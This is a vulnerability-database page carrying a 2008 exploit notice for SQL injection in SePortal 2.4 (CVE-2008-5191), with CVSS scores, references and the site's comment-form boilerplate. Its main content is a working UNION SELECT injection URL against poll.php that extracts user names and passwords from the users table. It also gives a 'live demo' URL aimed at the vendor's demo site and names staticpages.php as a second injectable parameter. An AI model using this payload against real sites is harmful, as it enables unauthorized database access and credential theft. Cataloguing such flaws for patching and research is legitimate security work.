SePortal 2.4 (poll.php poll_id) Remote SQL Injection Vulnerability

2008-11-23 / 2014-03-31

Credit: Mr.SQL

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-5191

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## SePortal V2.4 ( poll.php poll_id ) ( staticpages.php sp_id )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM
##
## Email : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS !!
########################
########################
##
## Script : SePortal V2.4
##
## site : www.seportal.org
##
## Download : http://www.seportal.org/downloads.php?action=showfile&id=1
##
########################
########################
##
## -(:: SQL ::)-
##
## www.site.com/
## poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*
##
##
## -(:: L!VE DEMO ::)-
##
## http://demo.seportal.org/poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*
##
## http://demo.seportal.org/staticpages.php?sp_id=1' << here maybe most registr ;)
##
#######################
#######################
#########
#########
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
#########
#########

References:

http://www.securityfocus.com/bid/29996

http://www.milw0rm.com/exploits/5960

http://secunia.com/advisories/30865

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SePortal 2.4 (poll.php poll_id) Remote SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.